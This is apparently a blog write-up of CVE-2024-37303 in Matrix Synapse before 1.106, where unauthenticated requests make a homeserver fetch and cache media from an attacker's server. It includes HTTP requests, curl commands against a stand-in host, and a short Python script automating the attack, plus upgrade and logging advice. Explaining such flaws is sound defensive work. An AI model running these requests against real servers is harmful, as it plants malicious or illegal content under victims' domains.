Matrix’s Synapse is a big deal for secure, decentralized chat. But in June 2024, a new vulnerability—CVE-2024-37303—highlighted how an unauthenticated remote user can abuse media handling, possibly planting malicious or illegal content for anyone to download. Here’s why this matters, how the exploit works, a look at the code, and what you can do to protect yourself.
What’s the Issue?
In Synapse servers before version 1.106, it’s possible for someone outside your server—*without even logging in*—to make your homeserver download and cache a file (such as an image, video, or document) hosted on their own server. Once cached, that file is now available to anyone (still no authentication needed) from your server as if it were your own media.
Uploading Content Remotely:
An attacker uploads problematic media (malware, illegal images, etc.) to a Matrix homeserver they control.
Triggering the Download:
Using unauthenticated endpoints on other public Matrix homeservers (including yours), they ask your server to fetch and cache that file by simply referencing the media ID and server name.
Rogue Media Hosted Locally:
Your server fetches, stores, and makes that content available on its public media endpoint for everyone, without authentication.
What Does This Look Like in Code?
Suppose your server is my.matrix.org and the attacker’s is evil.matrix.net. The attacker’s file has a media ID of xyz123.
The following request (no login needed!) triggers your server to download and cache the media
GET /_matrix/media/v3/download/evil.matrix.net/xyz123 HTTP/1.1
Host: my.matrix.org
You can try this with curl
curl -v "https://my.matrix.org/_matrix/media/v3/download/evil.matrix.net/xyz123";
When you run this, my.matrix.org fetches and caches the file from evil.matrix.net, then serves it up to anyone.
Anonymity for Attackers:
The whole process is unauthenticated. Attackers can plant and serve problematic media via your domain, leaving you with the legal and reputational risk.
1. Attacker Prepares Media
On their own Matrix server, evil.matrix.net, the attacker uploads a malicious file and gets the media ID, say, abcde12345.
Using curl (or a browser), they hit your public homeserver
curl "https://your.matrix.org/_matrix/media/v3/download/evil.matrix.net/abcde12345";
Now, your server downloads and stores the file in its local repo.
Anyone can now retrieve the file directly from your homeserver
curl "https://your.matrix.org/_matrix/media/v3/download/evil.matrix.net/abcde12345";
Or from the internal cache, which usually lands at a different URL depending on your setup.
Here’s a simple Python script that automates the attack
import requests
# Target Synapse server (victim)
target = "https://your.matrix.org";
# Attacker's media info
evil_server = "evil.matrix.net"
media_id = "abcde12345"
# Trigger download and cache
endpoint = f"{target}/_matrix/media/v3/download/{evil_server}/{media_id}"
response = requests.get(endpoint)
if response.status_code == 200:
print("Media cached successfully on victim server!")
else:
print(f"Failed: {response.status_code}")
New endpoints now require authentication for media download.
- Old unauthenticated endpoints still function for compatibility, but will be frozen and eventually closed in a future release.
Upgrade ASAP to at least 1.106.
Restrict Media Access:
Consider restricting unauthenticated access to media endpoints using a web server config (nginx, Apache, etc.)
Review Logs:
Look for odd requests to /media/v3/download/ for remote server names you don’t recognize.
References and Further Reading
- Matrix Security Advisory: CVE-2024-37303
- Synapse GitHub Repository
- Matrix Media API Docs
Conclusion
CVE-2024-37303 shows a simple, powerful way for attackers to plant problematic files into community chat servers, with zero authentication. If you run Matrix Synapse, update now, audit your media repo, and watch for future endpoint changes that will finally close this security gap.
Timeline
Published on: 12/03/2024 17:15:10 UTC